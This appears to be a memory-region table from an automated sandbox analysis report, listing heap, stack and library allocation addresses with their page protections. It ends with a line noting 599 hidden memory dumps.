246C01C4000
heap
page read and write
246C0636000
heap
page read and write
246BE2FA000
heap
page read and write
246C032B000
heap
page read and write
22BCB8C0000
heap
page read and write
246C01B4000
heap
page read and write
246C0340000
heap
page read and write
29505FBC000
trusted library allocation
page read and write
7FFB49C73000
trusted library allocation
page execute and read and write
7FFB49EC0000
trusted library allocation
page read and write
133E7FFD000
heap
page read and write
246C0143000
heap
page read and write
22BCE0B7000
heap
page read and write
133E8001000
heap
page read and write
133E7F2D000
heap
page read and write
246C033E000
heap
page read and write
246BE2FE000
heap
page read and write
246C0323000
heap
page read and write
133E9FB9000
heap
page read and write
246C0653000
heap
page read and write
246C0158000
heap
page read and write
CFB000
stack
page read and write
246C0626000
heap
page read and write
246C0683000
heap
page read and write
13380124000
trusted library allocation
page read and write
246C0135000
heap
page read and write
246C033C000
heap
page read and write
246C0602000
heap
page read and write
246C015C000
heap
page read and write
23C4D7E000
stack
page read and write
22BCBAF0000
heap
page read and write
22BCBB4C000
heap
page read and write
246C0341000
heap
page read and write
246C014F000
heap
page read and write
2FFF000
stack
page read and write
295055BC000
trusted library allocation
page read and write
246C018C000
heap
page read and write
13390001000
trusted library allocation
page read and write
23C4DFF000
stack
page read and write
D80000
heap
page read and write
246C05F4000
heap
page read and write
246C0600000
heap
page read and write
246C0308000
heap
page read and write
22BCD801000
heap
page read and write
246C02B7000
heap
page read and write
133E9FBB000
heap
page read and write
246C064F000
heap
page read and write
CDDA4F6000
stack
page read and write
22BCB9C0000
heap
page read and write
1338015F000
trusted library allocation
page read and write
246C0649000
heap
page read and write
22BCBB4D000
heap
page read and write
22BCBA30000
heap
page read and write
246C01EE000
heap
page read and write
22BCE094000
heap
page read and write
246BE359000
heap
page read and write
246BE3BE000
heap
page read and write
246BE424000
heap
page read and write
246C065E000
heap
page read and write
1338042B000
trusted library allocation
page read and write
246C0306000
heap
page read and write
246C0334000
heap
page read and write
7FFB49D90000
trusted library allocation
page execute and read and write
246C0654000
heap
page read and write
383E000
stack
page read and write
246C0320000
heap
page read and write
246C0139000
heap
page read and write
22BCBA01000
heap
page read and write
133EA0F0000
heap
page read and write
23C547E000
stack
page read and write
22BCE0BC000
heap
page read and write
246C0156000
heap
page read and write
1338001D000
trusted library allocation
page read and write
22BCB9EC000
heap
page read and write
22BCBA3F000
heap
page read and write
246C0610000
heap
page read and write
22BCE1D0000
heap
page read and write
246C031C000
heap
page read and write
29500060000
trusted library allocation
page read and write
1338011C000
trusted library allocation
page read and write
1338043C000
trusted library allocation
page read and write
246C0335000
heap
page read and write
246C0620000
heap
page read and write
22BCBA29000
heap
page read and write
246C0306000
heap
page read and write
E06000
heap
page read and write
7FFB49C8C000
trusted library allocation
page read and write
A5D332F000
stack
page read and write
E00000
heap
page read and write
F5B000
stack
page read and write
7FFB49EB0000
trusted library allocation
page read and write
246BE41E000
heap
page read and write
399F000
stack
page read and write
22BCDA80000
heap
page read and write
22BCE0BC000
heap
page read and write
133E9FDC000
heap
page read and write
246C015C000
heap
page read and write
246C01F3000
heap
page read and write
246BE427000
heap
page read and write
246C0194000
heap
page read and write
389E000
stack
page read and write
295023BC000
trusted library allocation
page read and write
22BCDBD0000
trusted library allocation
page read and write
133E7FB4000
heap
page read and write
22BCB9EC000
heap
page read and write
1060000
heap
page read and write
BBD03FF000
stack
page read and write
22BCE1F0000
heap
page read and write
246C0315000
heap
page read and write
22BCB9D1000
heap
page read and write
22BCBA29000
heap
page read and write
3C3F000
stack
page read and write
22BCDFFC000
heap
page read and write
133E7FFB000
heap
page read and write
246C05EE000
heap
page read and write
7FFB49F20000
trusted library allocation
page read and write
246C030D000
heap
page read and write
246C0332000
heap
page read and write
246C060B000
heap
page read and write
246C02E9000
heap
page read and write
246BE330000
heap
page read and write
246C0310000
heap
page read and write
246C0629000
heap
page read and write
246C032E000
heap
page read and write
22BCBB25000
heap
page read and write
246C05FC000
heap
page read and write
133E7F7C000
heap
page read and write
A5D387E000
stack
page read and write
246BE2FD000
heap
page read and write
22BCE0BA000
heap
page read and write
246C033E000
heap
page read and write
7FFB49F70000
trusted library allocation
page read and write
133804EA000
trusted library allocation
page read and write
246C03B8000
heap
page read and write
133E9FA5000
heap
page read and write
246C0156000
heap
page read and write
246C0311000
heap
page read and write
22BCBA46000
heap
page read and write
246C0156000
heap
page read and write
22BCBA7D000
heap
page read and write
7FFB49E10000
trusted library allocation
page read and write
13380676000
trusted library allocation
page read and write
246C031D000
heap
page read and write
A5D3CFB000
stack
page read and write
7FFB49E70000
trusted library allocation
page read and write
7FFB49F00000
trusted library allocation
page read and write
23C49EF000
stack
page read and write
22BCBA3B000
heap
page read and write
246C0322000
heap
page read and write
BBD09FB000
stack
page read and write
246BE360000
heap
page read and write
D30000
heap
page read and write
22BCBA52000
heap
page read and write
22BCBA4C000
heap
page read and write
7FFB49F10000
trusted library allocation
page read and write
29504BBC000
trusted library allocation
page read and write
CDDAAFF000
stack
page read and write
246BE2FD000
heap
page read and write
246BE2FA000
heap
page read and write
246C0240000
heap
page read and write
246C0311000
heap
page read and write
22BCBA29000
heap
page read and write
133E7FB6000
heap
page read and write
246C016B000
heap
page read and write
246BFDD0000
heap
page read and write
295005A0000
trusted library allocation
page read and write
246C05DF000
heap
page read and write
246C0152000
heap
page read and write
23C4C73000
stack
page read and write
A5D3C7F000
stack
page read and write
295041BC000
trusted library allocation
page read and write
133E9EE0000
heap
page read and write
22BCD9D0000
heap
page read and write
246C0316000
heap
page read and write
246C02F1000
heap
page read and write
39FE000
stack
page read and write
246C0156000
heap
page read and write
29500FBC000
trusted library allocation
page read and write
23C4E7F000
stack
page read and write
246C0241000
heap
page read and write
1338053F000
trusted library allocation
page read and write
22BCDFEE000
heap
page read and write
246C05DB000
heap
page read and write
22BCBA03000
heap
page read and write
133E7EA0000
heap
page read and write
246C062F000
heap
page read and write
22BCD4A0000
heap
page read and write
246C0311000
heap
page read and write
There are 599 hidden memdumps, click here to show them.